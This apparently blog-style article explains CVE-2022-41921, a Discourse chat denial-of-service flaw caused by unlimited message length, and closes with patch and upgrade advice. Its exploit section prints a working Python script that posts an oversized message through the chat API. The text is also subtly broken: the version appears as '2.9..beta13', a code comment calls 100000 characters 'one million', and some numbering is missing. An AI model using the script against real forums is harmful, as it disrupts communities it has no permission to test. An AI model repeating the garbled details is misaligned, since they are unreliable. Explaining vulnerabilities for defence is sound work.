Discourse is a super popular open-source platform that powers discussion forums for communities all around the world. It’s the backbone behind everything from hobbyist message boards to official company Q&As. But back in 2022, a pretty serious bug surfaced—one that put the reliability of all that chat in danger. This is the story of CVE-2022-41921, and it’s all about chat messages… with no size limit.
Let’s break down this security issue so you understand why it’s a big deal, how it works, and what you—or your sysadmin—should do about it.
What Is CVE-2022-41921?
CVE-2022-41921 is a denial of service (DoS) vulnerability in Discourse, affecting versions prior to 2.9..beta13. In simple terms, the chat feature in Discourse let users send messages of any length: a word, a paragraph—or millions of characters!
That might sound harmless at first, but it creates a nightmare for servers and browsers. One huge message can mess up the display for every user, crash browsers, slow down servers, and generally make the chat feature unusable—a textbook denial-of-service scenario.
Why Is Unlimited Chat Message Length Bad?
Imagine someone pasting a novel into a chat, or worse, scripts that repeat characters millions of times. When Discourse tries to deliver that message to everyone:
Other users might get booted off the chat or see all their messages lost in the flood.
- Bots or trolls could automate attacks, repeatedly posting huge messages to keep the forum out of action.
Before the patch, *nothing* stopped someone from doing this on any Discourse site. All it took was a giant paste and a click.
How to Exploit CVE-2022-41921 (for Awareness)
Warning: Only test this on your own systems and never on any site you do not own or have explicit permission to test.
Go to any Discourse site with chat enabled (prior to v2.9..beta13).
2. Paste a massive chunk of text into the chat box. (A million characters is easy for a script or a quick copy-paste.)
Here’s a Python script showing how an attacker could automate this abuse through the Discourse API
import requests
# Replace these variables with your forum's values
DISCOURSE_URL = "https://your-discourse-site.com";
API_KEY = "your_api_key"
API_USERNAME = "your_username"
CHAT_CHANNEL_ID = 1 # Update as needed
# Build a giant message
huge_message = "A" * 100000 # One million 'A's
endpoint = f"{DISCOURSE_URL}/chat/api/channels/{CHAT_CHANNEL_ID}/messages"
headers = {
"Api-Key": API_KEY,
"Api-Username": API_USERNAME,
"Content-Type": "application/json"
}
data = {
"message": huge_message
}
response = requests.post(endpoint, json=data, headers=headers)
print(response.status_code)
print(response.text)
> Result: If successful, this message will be delivered, and everyone’s browser might suddenly seize up—sometimes permanently.
How Discourse Fixed It
The official patch (merged in Dec 2022) finally introduced a reasonable *chat message length limit*. Anything longer is simply rejected. If you try the exploit above on a patched server, you’ll get a friendly error saying your message is too long.
No workarounds existed before the patch. All admins of Discourse forums had to *upgrade* to version 2.9..beta13 or later. If you’re running an old Discourse, you’re still exposed!
If you run a Discourse server
- Immediately upgrade to 2.9..beta13 or later.
If you’re a regular user
- Alert your site admin to this vulnerability if your forum feels slow, crashes, or you see giant (maybe spammy) messages.
References and More Reading
- CVE record on NVD
- Discourse security advisory on GitHub
- Official Discourse changelog
Conclusion
CVE-2022-41921 might sound simple—just a missing message size check—but it’s a classic lesson that little oversights can cause huge security headaches. Unlimited chat message length can easily ruin the chat experience (or worse) for *everyone*. The fix is easy: update your Discourse! Protect your forum and keep the conversations flowing… safely.
Timeline
Published on: 11/28/2022 15:15:00 UTC
Last modified on: 12/01/2022 20:20:00 UTC